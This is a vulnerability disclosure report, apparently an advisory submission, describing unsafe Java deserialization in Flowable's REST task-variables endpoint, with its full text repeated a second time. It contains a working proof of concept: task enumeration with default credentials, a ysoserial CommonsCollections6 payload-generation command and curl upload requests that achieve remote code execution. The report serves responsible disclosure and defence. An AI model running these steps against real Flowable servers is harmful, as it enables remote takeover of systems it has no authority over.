Security Vulnerability Report -- CWE-502
Summary
The TaskVariableCollectionResource's multipart/form-data endpoint directly deserializes user-uploaded file content via ObjectInputStream.readObject() without any class whitelist filtering, allowing an authenticated user to achieve remote code execution (RCE) by crafting malicious serialized objects.
Vulnerability Description
Affected Repository: https://github.com/flowable/flowable-engine
Branch: main
Commit: 74fdb349c134e96e1f10592020ccca6e2e4b85f0
Static Analysis Report
Vulnerability Overview
The POST /runtime/tasks/{taskId}/variables endpoint supports uploading binary/serializable variables via multipart/form-data. When the request parameter type=serializable, the server directly uses java.io.ObjectInputStream.readObject() to deserialize the uploaded file, without applying any class whitelist/blacklist filtering. Under the default configuration rest.variables.allow.serializable=true, an authenticated attacker can upload malicious serialized payloads (such as CommonsCollections gadget chains) to achieve remote code execution.
Exploitation Prerequisites
| Condition |
Description |
| Authentication |
Requires HTTP Basic authentication, and user must have rest-api privilege (default flowable.rest.app.authentication-mode=verify-privilege) |
| Network Reachability |
Intranet/public network (depending on deployment) |
| Input Constraints |
Need to know a valid taskId |
| Business Prerequisites |
None |
| Configuration Dependency |
rest.variables.allow.serializable=true (default configuration, see flowable-default.properties:57) |
Trigger Location
TaskVariableBaseResource.java:182-186
} else if (isSerializableVariableAllowed) {
// Try deserializing the object
ObjectInputStream stream = new ObjectInputStream(file.getInputStream());
Object value = stream.readObject(); // <--- unsafe deserialization
setVariable(task, variableName, value, scope, isNew);
stream.close();
Data Flow Overview
HTTP POST /runtime/tasks/{taskId}/variables (multipart/form-data)
params: name=testVar, type=serializable, file=@payload.ser
↓
TaskVariableCollectionResource.createTaskVariable (TaskVariableCollectionResource.java:124)
↓
request instanceof MultipartHttpServletRequest → true
↓
setBinaryVariable(request, task, true) (TaskVariableBaseResource.java:123)
↓
variableType = request.getParameterMap()["type"][0] → "serializable"
↓
file = request.getFile(first key) → MultipartFile
↓
ObjectInputStream(file.getInputStream()).readObject() (TaskVariableBaseResource.java:184-185) [SINK]
Data Flow Detailed Code Analysis
Layer 1: Entry Controller
- file:
TaskVariableCollectionResource.java:124-130
- External input:
taskId (PathVariable), request (HttpServletRequest)
- Operation: Gets Task object, checks if request is multipart
- Passed to next layer:
setBinaryVariable((MultipartHttpServletRequest) request, task, true)
Layer 2: Task Retrieval (no access control)
- file:
TaskBaseResource.java:595-601
- Operation:
taskService.createTaskQuery().taskId(taskId).singleResult() — no permission check
Layer 3: setBinaryVariable — parameter extraction
- file:
TaskVariableBaseResource.java:123-156
- Operation: Extracts
name, type, scope parameters from multipart form, gets first uploaded file
Layer 4: Type validation
- file:
TaskVariableBaseResource.java:164-167
- Operation: Validates variableType must be
binary or serializable, no security filtering
Layer 5: Deserialization Sink
- file:
TaskVariableBaseResource.java:182-187
- External input:
file.getInputStream() — user-uploaded file raw byte stream
- Operation:
new ObjectInputStream(file.getInputStream()).readObject() — direct deserialization, no class filtering
CVSS Breakdown
CVSS v3.1 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 8.8
| Vector |
Value |
Reason |
| AV (Attack Vector) |
N (Network) |
REST API accessible via network |
| AC (Attack Complexity) |
L (Low) |
Only needs to construct multipart request and upload serialized payload |
| PR (Privileges Required) |
L (Low) |
Requires authenticated user with rest-api privilege |
| UI (User Interaction) |
N (None) |
No user interaction required |
| S (Scope) |
U (Unchanged) |
Impact limited to Flowable application itself |
| C (Confidentiality) |
H (High) |
RCE can fully read application data and config |
| I (Integrity) |
H (High) |
RCE can modify arbitrary data, deploy malicious process definitions |
| A (Availability) |
H (High) |
RCE can cause complete service unavailability |
PoC Verification Report
Flowable REST TaskVariable ObjectInputStream Deserialization RCE
Vulnerability Summary
- Vulnerability Name: TaskVariableCollectionResource multipart/form-data unsafe deserialization RCE
- Affected Component/Port: Flowable REST API (flowable-rest-7.1.0.war), port 8080
- Vulnerability Description: The
POST /runtime/tasks/{taskId}/variables endpoint directly uses ObjectInputStream.readObject() to deserialize uploaded file content when receiving multipart/form-data requests with type=serializable, without any class whitelist filtering. An authenticated attacker can upload malicious serialized objects generated by tools like ysoserial to achieve remote code execution.
- Root Cause Code Snippet:
// TaskVariableBaseResource.java:182-187
} else if (isSerializableVariableAllowed) {
ObjectInputStream stream = new ObjectInputStream(file.getInputStream());
Object value = stream.readObject(); // no class whitelist filtering
setVariable(task, variableName, value, scope, isNew);
stream.close();
}
- Brief Data Flow:
HTTP POST multipart/form-data (type=serializable, file=@payload.ser)
↓
TaskVariableCollectionResource.createTaskVariable (TaskVariableCollectionResource.java:124)
↓
setBinaryVariable(request, task, true) (TaskVariableBaseResource.java:123)
↓
type validation: "serializable" passes (TaskVariableBaseResource.java:164-167)
↓
new ObjectInputStream(file.getInputStream()).readObject() (TaskVariableBaseResource.java:185) [SINK]
↓
gadget chain triggers → Runtime.exec() → RCE
Exploitation Conditions
| Condition |
Description |
| Authentication |
Requires HTTP Basic Auth (any valid user, default rest-admin:test) |
| Network Reachability |
Intranet/public network (REST API port 8080 reachable) |
| Configuration Dependency |
Exploitable with default config (rest.variables.allow.serializable=true) |
| Other Prerequisites |
Need a valid taskId (can be enumerated via /runtime/tasks endpoint) |
Exploitation Chain Progress
| Chain Stage |
Location (file:line) |
Status |
Evidence / Description |
| Entry |
TaskVariableCollectionResource.java:124 |
Reachable |
POST multipart request successfully entered createTaskVariable |
| Parameter extraction |
TaskVariableBaseResource.java:142-156 |
Reached |
name=testVar, type=serializable extracted from multipart form |
| Type validation |
TaskVariableBaseResource.java:164-167 |
Passed |
type="serializable" passes binary/serializable validation |
| Sink |
TaskVariableBaseResource.java:184-185 |
Triggered |
ObjectInputStream.readObject() deserialization executed, CC6 gadget chain triggered Runtime.exec() |
| Conclusion |
— |
Full Chain Closed |
RCE successful, server created files /tmp/poc_entry_0658 and /tmp/poc_entry_0658_h2 |
Exploitation Verification
Step 1: Obtain valid taskId
curl -s -u rest-admin:test 'http://localhost:8080/flowable-rest/service/runtime/tasks?size=1' | python3 -c "import sys,json; print(json.load(sys.stdin)['data'][0]['id'])"
Actual execution result: returned taskId d89ce83e-8fff-11f1-a444-02423661ba3a (can also use existing tasks).
Step 2: Generate ysoserial CommonsCollections6 payload
Flowable WAR's classpath contains commons-collections-3.2.2.jar, CC6 gadget chain can be used. Server runs JDK 17, need to add --add-opens parameters to generate payload:
java --add-opens java.base/java.util=ALL-UNNAMED \
--add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658' > payload.ser
Actual execution result: Generated 1298-byte serialized payload file payload.ser.
Step 3: Send malicious multipart request to trigger deserialization (end-to-end attack command)
curl -s -u rest-admin:test \
-X POST \
-H "Content-Type: multipart/form-data" \
-F "name=testVar" \
-F "type=serializable" \
-F "file=@payload.ser" \
"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"
Actual execution result:
- HTTP response code: 201 Created
- Response body:
{"name":"testVar","type":"serializable","value":null,"valueUrl":"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables/testVar/data","scope":"local"}
- Server filesystem verification:
ls -la /tmp/poc_entry_0658 shows file was created:
-rw-r----- 1 root root 0 Aug 4 12:28 /tmp/poc_entry_0658
Step 4: Repeatability verification
Using the same method to generate a second payload touch /tmp/poc_entry_0658_h2, after sending the request also received HTTP 201 and file was successfully created:
java --add-opens java.base/java.util=ALL-UNNAMED \
--add-opens java.base/java.lang=ALL-UNNAMED \
--add-opens java.base/java.lang.reflect=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658_h2' > payload_h2.ser
curl -s -u rest-admin:test \
-X POST \
-F "name=testVar2" -F "type=serializable" \
-F "file=@payload_h2.ser" \
"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"
Result: HTTP 201, /tmp/poc_entry_0658_h2 file successfully created. Third repeat test /tmp/poc_entry_0658_h3 also succeeded.
Conclusion: An authenticated attacker can upload a ysoserial CommonsCollections6 gadget chain payload through the POST /runtime/tasks/{taskId}/variables endpoint, triggering ObjectInputStream.readObject() deserialization, executing arbitrary OS commands on the Flowable server with Tomcat process privileges (root). This vulnerability is exploitable under default configuration without any additional configuration changes. Three independent tests all successfully created server-side files, RCE fully confirmed.
Severity
CVSS v3.1: 8.8 (High)
Vulnerability Category: CWE-502
CVE Assignment Request
If this vulnerability is confirmed as genuine, we would be grateful if you could request a CVE ID from GitHub for this security advisory.
Even if this vulnerability no longer affects the latest version, we kindly ask whether a CVE could still be assigned for the historically affected versions, as this would assist users and organizations in identifying and remediating the issue in legacy deployments.
Thank you for your help.
Security Vulnerability Report -- CWE-502
Summary
The TaskVariableCollectionResource's multipart/form-data endpoint directly deserializes user-uploaded file content via
ObjectInputStream.readObject()without any class whitelist filtering, allowing an authenticated user to achieve remote code execution (RCE) by crafting malicious serialized objects.Vulnerability Description
Affected Repository: https://github.com/flowable/flowable-engine
Branch: main
Commit:
74fdb349c134e96e1f10592020ccca6e2e4b85f0Static Analysis Report
Vulnerability Overview
The
POST /runtime/tasks/{taskId}/variablesendpoint supports uploading binary/serializable variables viamultipart/form-data. When the request parametertype=serializable, the server directly usesjava.io.ObjectInputStream.readObject()to deserialize the uploaded file, without applying any class whitelist/blacklist filtering. Under the default configurationrest.variables.allow.serializable=true, an authenticated attacker can upload malicious serialized payloads (such as CommonsCollections gadget chains) to achieve remote code execution.Exploitation Prerequisites
rest-apiprivilege (defaultflowable.rest.app.authentication-mode=verify-privilege)rest.variables.allow.serializable=true(default configuration, see flowable-default.properties:57)Trigger Location
TaskVariableBaseResource.java:182-186Data Flow Overview
Data Flow Detailed Code Analysis
Layer 1: Entry Controller
TaskVariableCollectionResource.java:124-130taskId(PathVariable),request(HttpServletRequest)setBinaryVariable((MultipartHttpServletRequest) request, task, true)Layer 2: Task Retrieval (no access control)
TaskBaseResource.java:595-601taskService.createTaskQuery().taskId(taskId).singleResult()— no permission checkLayer 3: setBinaryVariable — parameter extraction
TaskVariableBaseResource.java:123-156name,type,scopeparameters from multipart form, gets first uploaded fileLayer 4: Type validation
TaskVariableBaseResource.java:164-167binaryorserializable, no security filteringLayer 5: Deserialization Sink
TaskVariableBaseResource.java:182-187file.getInputStream()— user-uploaded file raw byte streamnew ObjectInputStream(file.getInputStream()).readObject()— direct deserialization, no class filteringCVSS Breakdown
CVSS v3.1 Score: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H = 8.8
PoC Verification Report
Flowable REST TaskVariable ObjectInputStream Deserialization RCE
Vulnerability Summary
POST /runtime/tasks/{taskId}/variablesendpoint directly usesObjectInputStream.readObject()to deserialize uploaded file content when receivingmultipart/form-datarequests withtype=serializable, without any class whitelist filtering. An authenticated attacker can upload malicious serialized objects generated by tools like ysoserial to achieve remote code execution.Exploitation Conditions
rest.variables.allow.serializable=true)/runtime/tasksendpoint)Exploitation Chain Progress
/tmp/poc_entry_0658and/tmp/poc_entry_0658_h2Exploitation Verification
Step 1: Obtain valid taskId
Actual execution result: returned taskId
d89ce83e-8fff-11f1-a444-02423661ba3a(can also use existing tasks).Step 2: Generate ysoserial CommonsCollections6 payload
Flowable WAR's classpath contains
commons-collections-3.2.2.jar, CC6 gadget chain can be used. Server runs JDK 17, need to add--add-opensparameters to generate payload:java --add-opens java.base/java.util=ALL-UNNAMED \ --add-opens java.base/java.lang=ALL-UNNAMED \ --add-opens java.base/java.lang.reflect=ALL-UNNAMED \ -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658' > payload.serActual execution result: Generated 1298-byte serialized payload file
payload.ser.Step 3: Send malicious multipart request to trigger deserialization (end-to-end attack command)
Actual execution result:
{"name":"testVar","type":"serializable","value":null,"valueUrl":"http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables/testVar/data","scope":"local"}ls -la /tmp/poc_entry_0658shows file was created:Step 4: Repeatability verification
Using the same method to generate a second payload
touch /tmp/poc_entry_0658_h2, after sending the request also received HTTP 201 and file was successfully created:java --add-opens java.base/java.util=ALL-UNNAMED \ --add-opens java.base/java.lang=ALL-UNNAMED \ --add-opens java.base/java.lang.reflect=ALL-UNNAMED \ -jar ysoserial-all.jar CommonsCollections6 'touch /tmp/poc_entry_0658_h2' > payload_h2.ser curl -s -u rest-admin:test \ -X POST \ -F "name=testVar2" -F "type=serializable" \ -F "file=@payload_h2.ser" \ "http://localhost:8080/flowable-rest/service/runtime/tasks/d89ce83e-8fff-11f1-a444-02423661ba3a/variables"Result: HTTP 201,
/tmp/poc_entry_0658_h2file successfully created. Third repeat test/tmp/poc_entry_0658_h3also succeeded.Conclusion: An authenticated attacker can upload a ysoserial CommonsCollections6 gadget chain payload through the
POST /runtime/tasks/{taskId}/variablesendpoint, triggeringObjectInputStream.readObject()deserialization, executing arbitrary OS commands on the Flowable server with Tomcat process privileges (root). This vulnerability is exploitable under default configuration without any additional configuration changes. Three independent tests all successfully created server-side files, RCE fully confirmed.Severity
CVSS v3.1: 8.8 (High)
Vulnerability Category: CWE-502
CVE Assignment Request
If this vulnerability is confirmed as genuine, we would be grateful if you could request a CVE ID from GitHub for this security advisory.
Even if this vulnerability no longer affects the latest version, we kindly ask whether a CVE could still be assigned for the historically affected versions, as this would assist users and organizations in identifying and remediating the issue in legacy deployments.
Thank you for your help.